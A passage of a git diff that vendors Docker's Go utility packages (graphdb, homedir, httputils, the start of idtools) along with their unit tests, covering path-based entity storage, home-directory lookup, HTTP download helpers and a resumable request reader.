db.Set("/webapp/same-ref-diff-name", child5.ID()); err != nil { + t.Fatal(err) + } + + entity := db.Get("/webapp/db/logs") + if entity == nil { + t.Fatal("Entity should not be nil") + } + if entity.ID() != "4" { + t.Fatalf("Expected to get entity with id 4, got %s", entity.ID()) + } +} + +func TestEnitiesPaths(t *testing.T) { + // TODO Windows: Port this test + if runtime.GOOS == "windows" { + t.Skip("Needs porting to Windows") + } + db, dbpath := newTestDb(t) + defer destroyTestDb(dbpath) + _, err := db.Set("/webapp", "1") + if err != nil { + t.Fatal(err) + } + child2, err := db.Set("/db", "2") + if err != nil { + t.Fatal(err) + } + child4, err := db.Set("/logs", "4") + if err != nil { + t.Fatal(err) + } + if _, err := db.Set("/db/logs", child4.ID()); err != nil { + t.Fatal(err) + } + + child3, err := db.Set("/sentry", "3") + if err != nil { + t.Fatal(err) + } + if _, err := db.Set("/webapp/sentry", child3.ID()); err != nil { + t.Fatal(err) + } + if _, err := db.Set("/webapp/db", child2.ID()); err != nil { + t.Fatal(err) + } + + child5, err := db.Set("/gograph", "5") + if err != nil { + t.Fatal(err) + } + if _, err := db.Set("/webapp/same-ref-diff-name", child5.ID()); err != nil { + t.Fatal(err) + } + + out := db.List("/", -1) + for _, p := range out.Paths() { + t.Log(p) + } +} + +func TestDeleteRootEntity(t *testing.T) { + db, dbpath := newTestDb(t) + defer destroyTestDb(dbpath) + + if err := db.Delete("/"); err == nil { + t.Fatal("Error should not be nil") + } +} + +func TestDeleteEntity(t *testing.T) { + // TODO Windows: Port this test + if runtime.GOOS == "windows" { + t.Skip("Needs porting to Windows") + } + db, dbpath := newTestDb(t) + defer destroyTestDb(dbpath) + _, err := db.Set("/webapp", "1") + if err != nil { + t.Fatal(err) + } + child2, err := db.Set("/db", "2") + if err != nil { + t.Fatal(err) + } + child4, err := db.Set("/logs", "4") + if err != nil { + t.Fatal(err) + } + if _, err := db.Set("/db/logs", child4.ID()); err != nil { + t.Fatal(err) + } 
+ + child3, err := db.Set("/sentry", "3") + if err != nil { + t.Fatal(err) + } + if _, err := db.Set("/webapp/sentry", child3.ID()); err != nil { + t.Fatal(err) + } + if _, err := db.Set("/webapp/db", child2.ID()); err != nil { + t.Fatal(err) + } + + child5, err := db.Set("/gograph", "5") + if err != nil { + t.Fatal(err) + } + if _, err := db.Set("/webapp/same-ref-diff-name", child5.ID()); err != nil { + t.Fatal(err) + } + + if err := db.Delete("/webapp/sentry"); err != nil { + t.Fatal(err) + } + entity := db.Get("/webapp/sentry") + if entity != nil { + t.Fatal("Entity /webapp/sentry should be nil") + } +} + +func TestCountRefs(t *testing.T) { + // TODO Windows: Port this test + if runtime.GOOS == "windows" { + t.Skip("Needs porting to Windows") + } + db, dbpath := newTestDb(t) + defer destroyTestDb(dbpath) + + db.Set("/webapp", "1") + + if db.Refs("1") != 1 { + t.Fatal("Expect reference count to be 1") + } + + db.Set("/db", "2") + db.Set("/webapp/db", "2") + if db.Refs("2") != 2 { + t.Fatal("Expect reference count to be 2") + } +} + +func TestPurgeId(t *testing.T) { + // TODO Windows: Port this test + if runtime.GOOS == "windows" { + t.Skip("Needs porting to Windows") + } + + db, dbpath := newTestDb(t) + defer destroyTestDb(dbpath) + + db.Set("/webapp", "1") + + if c := db.Refs("1"); c != 1 { + t.Fatalf("Expect reference count to be 1, got %d", c) + } + + db.Set("/db", "2") + db.Set("/webapp/db", "2") + + count, err := db.Purge("2") + if err != nil { + t.Fatal(err) + } + if count != 2 { + t.Fatalf("Expected 2 references to be removed, got %d", count) + } +} + +// Regression test https://github.com/docker/docker/issues/12334 +func TestPurgeIdRefPaths(t *testing.T) { + // TODO Windows: Port this test + if runtime.GOOS == "windows" { + t.Skip("Needs porting to Windows") + } + db, dbpath := newTestDb(t) + defer destroyTestDb(dbpath) + + db.Set("/webapp", "1") + db.Set("/db", "2") + + db.Set("/db/webapp", "1") + + if c := db.Refs("1"); c != 2 { + t.Fatalf("Expected 2 
reference for webapp, got %d", c) + } + if c := db.Refs("2"); c != 1 { + t.Fatalf("Expected 1 reference for db, got %d", c) + } + + if rp := db.RefPaths("2"); len(rp) != 1 { + t.Fatalf("Expected 1 reference path for db, got %d", len(rp)) + } + + count, err := db.Purge("2") + if err != nil { + t.Fatal(err) + } + + if count != 2 { + t.Fatalf("Expected 2 rows to be removed, got %d", count) + } + + if c := db.Refs("2"); c != 0 { + t.Fatalf("Expected 0 reference for db, got %d", c) + } + if c := db.Refs("1"); c != 1 { + t.Fatalf("Expected 1 reference for webapp, got %d", c) + } +} + +func TestRename(t *testing.T) { + // TODO Windows: Port this test + if runtime.GOOS == "windows" { + t.Skip("Needs porting to Windows") + } + db, dbpath := newTestDb(t) + defer destroyTestDb(dbpath) + + db.Set("/webapp", "1") + + if db.Refs("1") != 1 { + t.Fatal("Expect reference count to be 1") + } + + db.Set("/db", "2") + db.Set("/webapp/db", "2") + + if db.Get("/webapp/db") == nil { + t.Fatal("Cannot find entity at path /webapp/db") + } + + if err := db.Rename("/webapp/db", "/webapp/newdb"); err != nil { + t.Fatal(err) + } + if db.Get("/webapp/db") != nil { + t.Fatal("Entity should not exist at /webapp/db") + } + if db.Get("/webapp/newdb") == nil { + t.Fatal("Cannot find entity at path /webapp/newdb") + } + +} + +func TestCreateMultipleNames(t *testing.T) { + // TODO Windows: Port this test + if runtime.GOOS == "windows" { + t.Skip("Needs porting to Windows") + } + + db, dbpath := newTestDb(t) + defer destroyTestDb(dbpath) + + db.Set("/db", "1") + if _, err := db.Set("/myapp", "1"); err != nil { + t.Fatal(err) + } + + db.Walk("/", func(p string, e *Entity) error { + t.Logf("%s\n", p) + return nil + }, -1) +} + +func TestRefPaths(t *testing.T) { + db, dbpath := newTestDb(t) + defer destroyTestDb(dbpath) + + db.Set("/webapp", "1") + + db.Set("/db", "2") + db.Set("/webapp/db", "2") + + refs := db.RefPaths("2") + if len(refs) != 2 { + t.Fatalf("Expected reference count to be 2, got %d", 
len(refs)) + } +} + +func TestExistsTrue(t *testing.T) { + db, dbpath := newTestDb(t) + defer destroyTestDb(dbpath) + + db.Set("/testing", "1") + + if !db.Exists("/testing") { + t.Fatalf("/tesing should exist") + } +} + +func TestExistsFalse(t *testing.T) { + // TODO Windows: Port this test + if runtime.GOOS == "windows" { + t.Skip("Needs porting to Windows") + } + db, dbpath := newTestDb(t) + defer destroyTestDb(dbpath) + + db.Set("/toerhe", "1") + + if db.Exists("/testing") { + t.Fatalf("/tesing should not exist") + } + +} + +func TestGetNameWithTrailingSlash(t *testing.T) { + db, dbpath := newTestDb(t) + defer destroyTestDb(dbpath) + + db.Set("/todo", "1") + + e := db.Get("/todo/") + if e == nil { + t.Fatalf("Entity should not be nil") + } +} + +func TestConcurrentWrites(t *testing.T) { + // TODO Windows: Port this test + if runtime.GOOS == "windows" { + t.Skip("Needs porting to Windows") + } + db, dbpath := newTestDb(t) + defer destroyTestDb(dbpath) + + errs := make(chan error, 2) + + save := func(name string, id string) { + if _, err := db.Set(fmt.Sprintf("/%s", name), id); err != nil { + errs <- err + } + errs <- nil + } + purge := func(id string) { + if _, err := db.Purge(id); err != nil { + errs <- err + } + errs <- nil + } + + save("/1", "1") + + go purge("1") + go save("/2", "2") + + any := false + for i := 0; i < 2; i++ { + if err := <-errs; err != nil { + any = true + t.Log(err) + } + } + if any { + t.Fail() + } +} diff --git a/vendor/github.com/docker/docker/pkg/graphdb/sort_linux.go b/vendor/github.com/docker/docker/pkg/graphdb/sort_linux.go new file mode 100644 index 0000000000..c07df077d8 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/graphdb/sort_linux.go @@ -0,0 +1,27 @@ +package graphdb + +import "sort" + +type pathSorter struct { + paths []string + by func(i, j string) bool +} + +func sortByDepth(paths []string) { + s := &pathSorter{paths, func(i, j string) bool { + return PathDepth(i) > PathDepth(j) + }} + sort.Sort(s) +} + +func (s 
*pathSorter) Len() int { + return len(s.paths) +} + +func (s *pathSorter) Swap(i, j int) { + s.paths[i], s.paths[j] = s.paths[j], s.paths[i] +} + +func (s *pathSorter) Less(i, j int) bool { + return s.by(s.paths[i], s.paths[j]) +} diff --git a/vendor/github.com/docker/docker/pkg/graphdb/sort_linux_test.go b/vendor/github.com/docker/docker/pkg/graphdb/sort_linux_test.go new file mode 100644 index 0000000000..ddf2266f60 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/graphdb/sort_linux_test.go @@ -0,0 +1,29 @@ +package graphdb + +import ( + "testing" +) + +func TestSort(t *testing.T) { + paths := []string{ + "/", + "/myreallylongname", + "/app/db", + } + + sortByDepth(paths) + + if len(paths) != 3 { + t.Fatalf("Expected 3 parts got %d", len(paths)) + } + + if paths[0] != "/app/db" { + t.Fatalf("Expected /app/db got %s", paths[0]) + } + if paths[1] != "/myreallylongname" { + t.Fatalf("Expected /myreallylongname got %s", paths[1]) + } + if paths[2] != "/" { + t.Fatalf("Expected / got %s", paths[2]) + } +} diff --git a/vendor/github.com/docker/docker/pkg/graphdb/unsupported.go b/vendor/github.com/docker/docker/pkg/graphdb/unsupported.go new file mode 100644 index 0000000000..2b8ba71724 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/graphdb/unsupported.go @@ -0,0 +1,3 @@ +// +build !cgo !linux + +package graphdb diff --git a/vendor/github.com/docker/docker/pkg/graphdb/utils_linux.go b/vendor/github.com/docker/docker/pkg/graphdb/utils_linux.go new file mode 100644 index 0000000000..9edd79c35e --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/graphdb/utils_linux.go @@ -0,0 +1,32 @@ +package graphdb + +import ( + "path" + "strings" +) + +// Split p on / +func split(p string) []string { + return strings.Split(p, "/") +} + +// PathDepth returns the depth or number of / in a given path +func PathDepth(p string) int { + parts := split(p) + if len(parts) == 2 && parts[1] == "" { + return 1 + } + return len(parts) +} + +func splitPath(p string) (parent, 
name string) { + if p[0] != '/' { + p = "/" + p + } + parent, name = path.Split(p) + l := len(parent) + if parent[l-1] == '/' { + parent = parent[:l-1] + } + return +} diff --git a/vendor/github.com/docker/docker/pkg/homedir/homedir.go b/vendor/github.com/docker/docker/pkg/homedir/homedir.go new file mode 100644 index 0000000000..8154e83f0c --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/homedir/homedir.go @@ -0,0 +1,39 @@ +package homedir + +import ( + "os" + "runtime" + + "github.com/opencontainers/runc/libcontainer/user" +) + +// Key returns the env var name for the user's home dir based on +// the platform being run on +func Key() string { + if runtime.GOOS == "windows" { + return "USERPROFILE" + } + return "HOME" +} + +// Get returns the home directory of the current user with the help of +// environment variables depending on the target operating system. +// Returned path should be used with "path/filepath" to form new paths. +func Get() string { + home := os.Getenv(Key()) + if home == "" && runtime.GOOS != "windows" { + if u, err := user.CurrentUser(); err == nil { + return u.Home + } + } + return home +} + +// GetShortcutString returns the string that is shortcut to user's home directory +// in the native shell of the platform running on. 
+func GetShortcutString() string { + if runtime.GOOS == "windows" { + return "%USERPROFILE%" // be careful while using in format functions + } + return "~" +} diff --git a/vendor/github.com/docker/docker/pkg/homedir/homedir_test.go b/vendor/github.com/docker/docker/pkg/homedir/homedir_test.go new file mode 100644 index 0000000000..7a95cb2bd7 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/homedir/homedir_test.go @@ -0,0 +1,24 @@ +package homedir + +import ( + "path/filepath" + "testing" +) + +func TestGet(t *testing.T) { + home := Get() + if home == "" { + t.Fatal("returned home directory is empty") + } + + if !filepath.IsAbs(home) { + t.Fatalf("returned path is not absolute: %s", home) + } +} + +func TestGetShortcutString(t *testing.T) { + shortcut := GetShortcutString() + if shortcut == "" { + t.Fatal("returned shortcut string is empty") + } +} diff --git a/vendor/github.com/docker/docker/pkg/httputils/httputils.go b/vendor/github.com/docker/docker/pkg/httputils/httputils.go new file mode 100644 index 0000000000..d7dc43877d --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/httputils/httputils.go @@ -0,0 +1,56 @@ +package httputils + +import ( + "errors" + "fmt" + "net/http" + "regexp" + "strings" + + "github.com/docker/docker/pkg/jsonmessage" +) + +var ( + headerRegexp = regexp.MustCompile(`^(?:(.+)/(.+?))\((.+)\).*$`) + errInvalidHeader = errors.New("Bad header, should be in format `docker/version (platform)`") +) + +// Download requests a given URL and returns an io.Reader. +func Download(url string) (resp *http.Response, err error) { + if resp, err = http.Get(url); err != nil { + return nil, err + } + if resp.StatusCode >= 400 { + return nil, fmt.Errorf("Got HTTP status code >= 400: %s", resp.Status) + } + return resp, nil +} + +// NewHTTPRequestError returns a JSON response error. 
+func NewHTTPRequestError(msg string, res *http.Response) error { + return &jsonmessage.JSONError{ + Message: msg, + Code: res.StatusCode, + } +} + +// ServerHeader contains the server information. +type ServerHeader struct { + App string // docker + Ver string // 1.8.0-dev + OS string // windows or linux +} + +// ParseServerHeader extracts pieces from an HTTP server header +// which is in the format "docker/version (os)" eg docker/1.8.0-dev (windows). +func ParseServerHeader(hdr string) (*ServerHeader, error) { + matches := headerRegexp.FindStringSubmatch(hdr) + if len(matches) != 4 { + return nil, errInvalidHeader + } + return &ServerHeader{ + App: strings.TrimSpace(matches[1]), + Ver: strings.TrimSpace(matches[2]), + OS: strings.TrimSpace(matches[3]), + }, nil +} diff --git a/vendor/github.com/docker/docker/pkg/httputils/httputils_test.go b/vendor/github.com/docker/docker/pkg/httputils/httputils_test.go new file mode 100644 index 0000000000..d35d082156 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/httputils/httputils_test.go @@ -0,0 +1,115 @@ +package httputils + +import ( + "fmt" + "io/ioutil" + "net/http" + "net/http/httptest" + "strings" + "testing" +) + +func TestDownload(t *testing.T) { + expected := "Hello, docker !" 
+ ts := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { + fmt.Fprintf(w, expected) + })) + defer ts.Close() + response, err := Download(ts.URL) + if err != nil { + t.Fatal(err) + } + + actual, err := ioutil.ReadAll(response.Body) + response.Body.Close() + + if err != nil || string(actual) != expected { + t.Fatalf("Expected the response %q, got err:%v, response:%v, actual:%s", expected, err, response, string(actual)) + } +} + +func TestDownload400Errors(t *testing.T) { + expectedError := "Got HTTP status code >= 400: 403 Forbidden" + ts := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { + // 403 + http.Error(w, "something failed (forbidden)", http.StatusForbidden) + })) + defer ts.Close() + // Expected status code = 403 + if _, err := Download(ts.URL); err == nil || err.Error() != expectedError { + t.Fatalf("Expected the the error %q, got %v", expectedError, err) + } +} + +func TestDownloadOtherErrors(t *testing.T) { + if _, err := Download("I'm not an url.."); err == nil || !strings.Contains(err.Error(), "unsupported protocol scheme") { + t.Fatalf("Expected an error with 'unsupported protocol scheme', got %v", err) + } +} + +func TestNewHTTPRequestError(t *testing.T) { + errorMessage := "Some error message" + ts := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { + // 403 + http.Error(w, errorMessage, http.StatusForbidden) + })) + defer ts.Close() + httpResponse, err := http.Get(ts.URL) + if err != nil { + t.Fatal(err) + } + if err := NewHTTPRequestError(errorMessage, httpResponse); err.Error() != errorMessage { + t.Fatalf("Expected err to be %q, got %v", errorMessage, err) + } +} + +func TestParseServerHeader(t *testing.T) { + inputs := map[string][]string{ + "bad header": {"error"}, + "(bad header)": {"error"}, + "(without/spaces)": {"error"}, + "(header/with spaces)": {"error"}, + "foo/bar (baz)": {"foo", "bar", "baz"}, + "foo/bar": {"error"}, + "foo": 
{"error"}, + "foo/bar (baz space)": {"foo", "bar", "baz space"}, + " f f / b b ( b s ) ": {"f f", "b b", "b s"}, + "foo/bar (baz) ignore": {"foo", "bar", "baz"}, + "foo/bar ()": {"error"}, + "foo/bar()": {"error"}, + "foo/bar(baz)": {"foo", "bar", "baz"}, + "foo/bar/zzz(baz)": {"foo/bar", "zzz", "baz"}, + "foo/bar(baz/abc)": {"foo", "bar", "baz/abc"}, + "foo/bar(baz (abc))": {"foo", "bar", "baz (abc)"}, + } + + for header, values := range inputs { + serverHeader, err := ParseServerHeader(header) + if err != nil { + if err != errInvalidHeader { + t.Fatalf("Failed to parse %q, and got some unexpected error: %q", header, err) + } + if values[0] == "error" { + continue + } + t.Fatalf("Header %q failed to parse when it shouldn't have", header) + } + if values[0] == "error" { + t.Fatalf("Header %q parsed ok when it should have failed(%q).", header, serverHeader) + } + + if serverHeader.App != values[0] { + t.Fatalf("Expected serverHeader.App for %q to equal %q, got %q", header, values[0], serverHeader.App) + } + + if serverHeader.Ver != values[1] { + t.Fatalf("Expected serverHeader.Ver for %q to equal %q, got %q", header, values[1], serverHeader.Ver) + } + + if serverHeader.OS != values[2] { + t.Fatalf("Expected serverHeader.OS for %q to equal %q, got %q", header, values[2], serverHeader.OS) + } + + } + +} diff --git a/vendor/github.com/docker/docker/pkg/httputils/mimetype.go b/vendor/github.com/docker/docker/pkg/httputils/mimetype.go new file mode 100644 index 0000000000..d5cf34e4f2 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/httputils/mimetype.go @@ -0,0 +1,30 @@ +package httputils + +import ( + "mime" + "net/http" +) + +// MimeTypes stores the MIME content type. +var MimeTypes = struct { + TextPlain string + Tar string + OctetStream string +}{"text/plain", "application/tar", "application/octet-stream"} + +// DetectContentType returns a best guess representation of the MIME +// content type for the bytes at c. 
The value detected by +// http.DetectContentType is guaranteed not be nil, defaulting to +// application/octet-stream when a better guess cannot be made. The +// result of this detection is then run through mime.ParseMediaType() +// which separates the actual MIME string from any parameters. +func DetectContentType(c []byte) (string, map[string]string, error) { + + ct := http.DetectContentType(c) + contentType, args, err := mime.ParseMediaType(ct) + if err != nil { + return "", nil, err + } + + return contentType, args, nil +} diff --git a/vendor/github.com/docker/docker/pkg/httputils/mimetype_test.go b/vendor/github.com/docker/docker/pkg/httputils/mimetype_test.go new file mode 100644 index 0000000000..9de433ee8c --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/httputils/mimetype_test.go @@ -0,0 +1,13 @@ +package httputils + +import ( + "testing" +) + +func TestDetectContentType(t *testing.T) { + input := []byte("That is just a plain text") + + if contentType, _, err := DetectContentType(input); err != nil || contentType != "text/plain" { + t.Errorf("TestDetectContentType failed") + } +} diff --git a/vendor/github.com/docker/docker/pkg/httputils/resumablerequestreader.go b/vendor/github.com/docker/docker/pkg/httputils/resumablerequestreader.go new file mode 100644 index 0000000000..bebc8608cd --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/httputils/resumablerequestreader.go @@ -0,0 +1,95 @@ +package httputils + +import ( + "fmt" + "io" + "net/http" + "time" + + "github.com/Sirupsen/logrus" +) + +type resumableRequestReader struct { + client *http.Client + request *http.Request + lastRange int64 + totalSize int64 + currentResponse *http.Response + failures uint32 + maxFailures uint32 +} + +// ResumableRequestReader makes it possible to resume reading a request's body transparently +// maxfail is the number of times we retry to make requests again (not resumes) +// totalsize is the total length of the body; auto detect if not provided +func 
ResumableRequestReader(c *http.Client, r *http.Request, maxfail uint32, totalsize int64) io.ReadCloser { + return &resumableRequestReader{client: c, request: r, maxFailures: maxfail, totalSize: totalsize} +} + +// ResumableRequestReaderWithInitialResponse makes it possible to resume +// reading the body of an already initiated request. +func ResumableRequestReaderWithInitialResponse(c *http.Client, r *http.Request, maxfail uint32, totalsize int64, initialResponse *http.Response) io.ReadCloser { + return &resumableRequestReader{client: c, request: r, maxFailures: maxfail, totalSize: totalsize, currentResponse: initialResponse} +} + +func (r *resumableRequestReader) Read(p []byte) (n int, err error) { + if r.client == nil || r.request == nil { + return 0, fmt.Errorf("client and request can't be nil\n") + } + isFreshRequest := false + if r.lastRange != 0 && r.currentResponse == nil { + readRange := fmt.Sprintf("bytes=%d-%d", r.lastRange, r.totalSize) + r.request.Header.Set("Range", readRange) + time.Sleep(5 * time.Second) + } + if r.currentResponse == nil { + r.currentResponse, err = r.client.Do(r.request) + isFreshRequest = true + } + if err != nil && r.failures+1 != r.maxFailures { + r.cleanUpResponse() + r.failures++ + time.Sleep(5 * time.Duration(r.failures) * time.Second) + return 0, nil + } else if err != nil { + r.cleanUpResponse() + return 0, err + } + if r.currentResponse.StatusCode == 416 && r.lastRange == r.totalSize && r.currentResponse.ContentLength == 0 { + r.cleanUpResponse() + return 0, io.EOF + } else if r.currentResponse.StatusCode != 206 && r.lastRange != 0 && isFreshRequest { + r.cleanUpResponse() + return 0, fmt.Errorf("the server doesn't support byte ranges") + } + if r.totalSize == 0 { + r.totalSize = r.currentResponse.ContentLength + } else if r.totalSize <= 0 { + r.cleanUpResponse() + return 0, fmt.Errorf("failed to auto detect content length") + } + n, err = r.currentResponse.Body.Read(p) + r.lastRange += int64(n) + if err != nil { + 
r.cleanUpResponse() + } + if err != nil && err != io.EOF { + logrus.Infof("encountered error during pull and clearing it before resume: %s", err) + err = nil + } + return n, err +} + +func (r *resumableRequestReader) Close() error { + r.cleanUpResponse() + r.client = nil + r.request = nil + return nil +} + +func (r *resumableRequestReader) cleanUpResponse() { + if r.currentResponse != nil { + r.currentResponse.Body.Close() + r.currentResponse = nil + } +} diff --git a/vendor/github.com/docker/docker/pkg/httputils/resumablerequestreader_test.go b/vendor/github.com/docker/docker/pkg/httputils/resumablerequestreader_test.go new file mode 100644 index 0000000000..5a2906db77 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/httputils/resumablerequestreader_test.go @@ -0,0 +1,307 @@ +package httputils + +import ( + "fmt" + "io" + "io/ioutil" + "net/http" + "net/http/httptest" + "strings" + "testing" +) + +func TestResumableRequestHeaderSimpleErrors(t *testing.T) { + ts := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { + fmt.Fprintln(w, "Hello, world !") + })) + defer ts.Close() + + client := &http.Client{} + + var req *http.Request + req, err := http.NewRequest("GET", ts.URL, nil) + if err != nil { + t.Fatal(err) + } + + expectedError := "client and request can't be nil\n" + resreq := &resumableRequestReader{} + _, err = resreq.Read([]byte{}) + if err == nil || err.Error() != expectedError { + t.Fatalf("Expected an error with '%s', got %v.", expectedError, err) + } + + resreq = &resumableRequestReader{ + client: client, + request: req, + totalSize: -1, + } + expectedError = "failed to auto detect content length" + _, err = resreq.Read([]byte{}) + if err == nil || err.Error() != expectedError { + t.Fatalf("Expected an error with '%s', got %v.", expectedError, err) + } + +} + +// Not too much failures, bails out after some wait +func TestResumableRequestHeaderNotTooMuchFailures(t *testing.T) { + client := &http.Client{} + + var 
badReq *http.Request + badReq, err := http.NewRequest("GET", "I'm not an url", nil) + if err != nil { + t.Fatal(err) + } + + resreq := &resumableRequestReader{ + client: client, + request: badReq, + failures: 0, + maxFailures: 2, + } + read, err := resreq.Read([]byte{}) + if err != nil || read != 0 { + t.Fatalf("Expected no error and no byte read, got err:%v, read:%v.", err, read) + } +} + +// Too much failures, returns the error +func TestResumableRequestHeaderTooMuchFailures(t *testing.T) { + client := &http.Client{} + + var badReq *http.Request + badReq, err := http.NewRequest("GET", "I'm not an url", nil) + if err != nil { + t.Fatal(err) + } + + resreq := &resumableRequestReader{ + client: client, + request: badReq, + failures: 0, + maxFailures: 1, + } + defer resreq.Close() + + expectedError := `Get I%27m%20not%20an%20url: unsupported protocol scheme ""` + read, err := resreq.Read([]byte{}) + if err == nil || err.Error() != expectedError || read != 0 { + t.Fatalf("Expected the error '%s', got err:%v, read:%v.", expectedError, err, read) + } +} + +type errorReaderCloser struct{} + +func (errorReaderCloser) Close() error { return nil } + +func (errorReaderCloser) Read(p []byte) (n int, err error) { + return 0, fmt.Errorf("An error occurred") +} + +// If an unknown error is encountered, return 0, nil and log it +func TestResumableRequestReaderWithReadError(t *testing.T) { + var req *http.Request + req, err := http.NewRequest("GET", "", nil) + if err != nil { + t.Fatal(err) + } + + client := &http.Client{} + + response := &http.Response{ + Status: "500 Internal Server", + StatusCode: 500, + ContentLength: 0, + Close: true, + Body: errorReaderCloser{}, + } + + resreq := &resumableRequestReader{ + client: client, + request: req, + currentResponse: response, + lastRange: 1, + totalSize: 1, + } + defer resreq.Close() + + buf := make([]byte, 1) + read, err := resreq.Read(buf) + if err != nil { + t.Fatal(err) + } + + if read != 0 { + t.Fatalf("Expected to have read 
nothing, but read %v", read) + } +} + +func TestResumableRequestReaderWithEOFWith416Response(t *testing.T) { + var req *http.Request + req, err := http.NewRequest("GET", "", nil) + if err != nil { + t.Fatal(err) + } + + client := &http.Client{} + + response := &http.Response{ + Status: "416 Requested Range Not Satisfiable", + StatusCode: 416, + ContentLength: 0, + Close: true, + Body: ioutil.NopCloser(strings.NewReader("")), + } + + resreq := &resumableRequestReader{ + client: client, + request: req, + currentResponse: response, + lastRange: 1, + totalSize: 1, + } + defer resreq.Close() + + buf := make([]byte, 1) + _, err = resreq.Read(buf) + if err == nil || err != io.EOF { + t.Fatalf("Expected an io.EOF error, got %v", err) + } +} + +func TestResumableRequestReaderWithServerDoesntSupportByteRanges(t *testing.T) { + ts := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { + if r.Header.Get("Range") == "" { + t.Fatalf("Expected a Range HTTP header, got nothing") + } + })) + defer ts.Close() + + var req *http.Request + req, err := http.NewRequest("GET", ts.URL, nil) + if err != nil { + t.Fatal(err) + } + + client := &http.Client{} + + resreq := &resumableRequestReader{ + client: client, + request: req, + lastRange: 1, + } + defer resreq.Close() + + buf := make([]byte, 2) + _, err = resreq.Read(buf) + if err == nil || err.Error() != "the server doesn't support byte ranges" { + t.Fatalf("Expected an error 'the server doesn't support byte ranges', got %v", err) + } +} + +func TestResumableRequestReaderWithZeroTotalSize(t *testing.T) { + + srvtxt := "some response text data" + + ts := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { + fmt.Fprintln(w, srvtxt) + })) + defer ts.Close() + + var req *http.Request + req, err := http.NewRequest("GET", ts.URL, nil) + if err != nil { + t.Fatal(err) + } + + client := &http.Client{} + retries := uint32(5) + + resreq := ResumableRequestReader(client, req, retries, 0) 
+ defer resreq.Close() + + data, err := ioutil.ReadAll(resreq) + if err != nil { + t.Fatal(err) + } + + resstr := strings.TrimSuffix(string(data), "\n") + + if resstr != srvtxt { + t.Errorf("resstr != srvtxt") + } +} + +func TestResumableRequestReader(t *testing.T) { + + srvtxt := "some response text data" + + ts := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { + fmt.Fprintln(w, srvtxt) + })) + defer ts.Close() + + var req *http.Request + req, err := http.NewRequest("GET", ts.URL, nil) + if err != nil { + t.Fatal(err) + } + + client := &http.Client{} + retries := uint32(5) + imgSize := int64(len(srvtxt)) + + resreq := ResumableRequestReader(client, req, retries, imgSize) + defer resreq.Close() + + data, err := ioutil.ReadAll(resreq) + if err != nil { + t.Fatal(err) + } + + resstr := strings.TrimSuffix(string(data), "\n") + + if resstr != srvtxt { + t.Errorf("resstr != srvtxt") + } +} + +func TestResumableRequestReaderWithInitialResponse(t *testing.T) { + + srvtxt := "some response text data" + + ts := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { + fmt.Fprintln(w, srvtxt) + })) + defer ts.Close() + + var req *http.Request + req, err := http.NewRequest("GET", ts.URL, nil) + if err != nil { + t.Fatal(err) + } + + client := &http.Client{} + retries := uint32(5) + imgSize := int64(len(srvtxt)) + + res, err := client.Do(req) + if err != nil { + t.Fatal(err) + } + + resreq := ResumableRequestReaderWithInitialResponse(client, req, retries, imgSize, res) + defer resreq.Close() + + data, err := ioutil.ReadAll(resreq) + if err != nil { + t.Fatal(err) + } + + resstr := strings.TrimSuffix(string(data), "\n") + + if resstr != srvtxt { + t.Errorf("resstr != srvtxt") + } +} diff --git a/vendor/github.com/docker/docker/pkg/idtools/idtools.go b/vendor/github.com/docker/docker/pkg/idtools/idtools.go new file mode 100644 index 0000000000..6bca466286 --- /dev/null +++ 
b/vendor/github.com/docker/docker/pkg/idtools/idtools.go @@ -0,0 +1,197 @@ +package idtools + +import ( + "bufio" + "fmt" + "os" + "sort" + "strconv" + "strings" +) + +// IDMap contains a single entry for user namespace range remapping. An array +// of IDMap entries represents the structure that will be provided to the Linux +// kernel for creating a user namespace. +type IDMap struct { + ContainerID int `json:"container_id"` + HostID int `json:"host_id"` + Size int `json:"size"` +} + +type subIDRange struct { + Start int + Length int +} + +type ranges []subIDRange + +func (e ranges) Len() int { return len(e) } +func (e ranges) Swap(i, j int) { e[i], e[j] = e[j], e[i] } +func (e ranges) Less(i, j int) bool { return e[i].Start < e[j].Start } + +const ( + subuidFileName string = "/etc/subuid" + subgidFileName string = "/etc/subgid" +) + +// MkdirAllAs creates a directory (include any along the path) and then modifies +// ownership to the requested uid/gid. If the directory already exists, this +// function will still change ownership to the requested uid/gid pair. +func MkdirAllAs(path string, mode os.FileMode, ownerUID, ownerGID int) error { + return mkdirAs(path, mode, ownerUID, ownerGID, true, true) +} + +// MkdirAllNewAs creates a directory (include any along the path) and then modifies +// ownership ONLY of newly created directories to the requested uid/gid. If the +// directories along the path exist, no change of ownership will be performed +func MkdirAllNewAs(path string, mode os.FileMode, ownerUID, ownerGID int) error { + return mkdirAs(path, mode, ownerUID, ownerGID, true, false) +} + +// MkdirAs creates a directory and then modifies ownership to the requested uid/gid. 
